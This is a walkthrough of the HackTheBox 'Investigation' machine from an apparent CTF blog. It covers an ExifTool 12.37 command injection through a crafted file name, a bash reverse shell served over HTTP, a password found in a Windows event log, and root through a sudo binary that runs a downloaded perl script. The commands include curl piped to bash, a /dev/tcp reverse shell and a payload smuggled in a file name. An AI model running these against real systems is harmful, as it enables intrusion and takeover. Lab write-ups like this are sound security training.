zerospl0it
  • CTF
    • Altered-Security
      • DART CTF
    • HackingHub
      • Vulnbegin
      • Vulnforum
      • Vulnlawyers
    • HackTheBox
      • Fortress
        • Akerva
        • Context
        • Jet
      • Machines
        • Bagel
        • BroScience
        • Derailed
        • Escape
        • Inject
        • Investigation
        • Mentor
        • Photobomb
        • Pollution
        • Precious
        • Soccer
        • Stocker
Powered by GitBook
On this page
  • Enumeration
  • Rustscan
  • Dirsearch
  • Website
  • Exploitation
  • Exiftool 12.37
  • Enumeration
  • Privilege Escalation: smorton
  • Privilege Escalation
  • Enumeration
  • Analyzing /usr/bin/binary
  • Become Root
  1. CTF
  2. HackTheBox
  3. Machines

Investigation

Enumeration

Rustscan

mkdir rust; sudo rustscan -t 1500 -b 1500 --ulimit 65000 -a 10.129.87.222 -- -sV -sC -oA ./rust/{{ip}}
Open 10.129.11.68:22
Open 10.129.11.68:80

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://eforenzics.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Dirsearch

dirsearch -u http://eforenzics.htb/
[20:42:57] Starting:                                         
[20:43:24] 301 -  317B  - /assets  ->  http://eforenzics.htb/assets/        
[20:43:24] 403 -  279B  - /assets/                                          
[20:43:41] 200 -   11KB - /index.html                                                                        
[20:44:08] 200 -    4KB - /upload.php

Website

Uploading an image will result in a report that you can view.

Example

ExifTool Version Number         : 12.37
File Name                       : image.jpg
Directory                       : .
File Size                       : 335 bytes
File Modification Date/Time     : 2023:01:23 20:03:07+00:00
File Access Date/Time           : 2023:01:23 20:03:07+00:00
File Inode Change Date/Time     : 2023:01:23 20:03:07+00:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Exif Byte Order                 : Big-endian (Motorola, MM)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Y Cb Cr Positioning             : Centered
DjVu Version                    : 0.24
Spatial Resolution              : 300
Gamma                           : 2.2
Orientation                     : Horizontal (normal)
Warning                         : Ignored invalid metadata entry(s)
Image Width                     : 1
Image Height                    : 1
Encoding Process                : Extended sequential DCT, arithmetic coding
Bits Per Sample                 : 8
Color Components                : 1
Image Size                      : 1x1
Megapixels                      : 0.000001

Exploitation

Using the discovered vulnerability we will try to gain a shell on our target.

Exiftool 12.37

# Generate malicious filename
cp image.jpg 'curl 10.10.14.71 | bash |'
# Generate an index.html containing our reverse shell code
cat index.html        
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.71/4444 0>&1"
# Host a webserver
python -m http.server 80
# In another tab create a listener
pwncat-cs -lp 4444

Enumeration

After we received our shell it's time to enumerate the systmen as we are just the www-data user without any further permissions.

Linpeas

Linpeas will show us a cronjob that runs regularly at a specific time and uses a script located at /usr/local/investigation. Inside that folder we will find an E-Mail that contains a Windows Security Log.

Cronjob

*/5 * * * * date >> /usr/local/investigation/analysed_log && echo "Clearing folders" >> /usr/local/investigation/analysed_log && rm -r /var/www/uploads/* && rm /var/www/html/analysed_images/*

Password Discovery

By searching the security.evtx file we come across something that looks like a password which is stored under TargetUserName.

# Convert .evtx to xml
python3 /home/mrk/.local/bin/evtx_dump.py ~/Downloads/security.evtx > events.xml
# Searching
grep "TargetUserName" events.xml | sort -u
...
<Data Name="TargetUserName">aanderson</Data>
<Data Name="TargetUserName">AAnderson</Data>
<Data Name="TargetUserName">Administrators</Data>
<Data Name="TargetUserName">CENSORED</Data>
<Data Name="TargetUserName">EFORENZICS-DI$</Data>
<Data Name="TargetUserName">hmarley</Data>
<Data Name="TargetUserName">HMarley</Data>
<Data Name="TargetUserName">hmraley</Data>
<Data Name="TargetUserName">ljenkins</Data>
<Data Name="TargetUserName">LJenkins</Data>
<Data Name="TargetUserName">lmonroe</Data>
<Data Name="TargetUserName">LMonroe</Data>
<Data Name="TargetUserName">LOCAL SERVICE</Data>

Privilege Escalation: smorton

Using the password we are able to switch from www-data to smorton.

su - smorton

Privilege Escalation

Enumeration

Checking the permissiosn of smorton reveals that we are able to run /usr/bin/binary as root.

smorton@investigation:~$ sudo -l
Matching Defaults entries for smorton on investigation:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User smorton may run the following commands on investigation:
    (root) NOPASSWD: /usr/bin/binary

Analyzing /usr/bin/binary

Executing the binary does result in receiving the text Exiting...

Snippet of decompiled function: main

    if (argc != 3) {
        puts("Exiting... ");
        exit(0);
    }
    iVar1 = getuid();
    if (iVar1 != 0) {
        puts("Exiting... ");
        exit(0);
    }
    iVar1 = strcmp(argv[2], "lDnxUysaQn");
    if (iVar1 == 0) {
        puts("Running... ");
        uVar2 = fopen(argv[2], 0x2027);
        uVar3 = curl_easy_init();
        curl_easy_setopt(uVar3, 0x2712, argv[1]);
        curl_easy_setopt(uVar3, 0x2711, uVar2);
        curl_easy_setopt(uVar3, 0x2d, 1);
        iVar1 = curl_easy_perform(uVar3);
        if (iVar1 == 0) {
            iVar1 = snprintf(0, 0, 0x202a, argv[2]);
            uVar4 = malloc((int64_t)iVar1 + 1);
            snprintf(uVar4, (int64_t)iVar1 + 1, 0x202a, argv[2]);
            iVar1 = snprintf(0, 0, "perl ./%s", uVar4);
            uVar5 = malloc((int64_t)iVar1 + 1);
            snprintf(uVar5, (int64_t)iVar1 + 1, "perl ./%s", uVar4);
            fclose(uVar2);
            .plt.sec(uVar3);
            setuid(0);
            system(uVar5);
            system("rm -f ./lDnxUysaQn");
            return 0;
        }
        puts("Exiting... ");
        exit(0);
    }
    puts("Exiting... ");
    exit(0);
    return 0;

I'm not a pro at asm or c but looking at the code it's clear to me that we have to:

  1. Provide 2 additional arguments

  2. argv[1] should be a perl script hosted on a web resource

  3. argv[2] has to be the string lDnxUysaQn

Become Root

root.pl

Let's prepare a simple perl script to get a root shell

exec "/bin/bash";

Python Webserver

Host a webserver to serve that file

python3 -m http.server 8080

Privilege Escalation

The fun part, let's become root

smorton@investigation:~$ /bin/sudo /usr/bin/binary http://10.10.14.52:8080/root.pl lDnxUysaQn
Running... 
root@investigation:/home/smorton# whoami
root

Last updated 1 year ago

Checking the Website we notice that there's a service that they offer located at . The service is described as Image Forensics. You are able to upload an image file and they will provide a detailed forensic analysis.

The first line shows us the used ExifTool Version which is 12.37. If you look this up you'll come across

We pull that binary to our machine and use to take a look at the decompiled code.

http://eforenzics.htb/service.html
Command Injection: Exiftool before 12.38
Cutter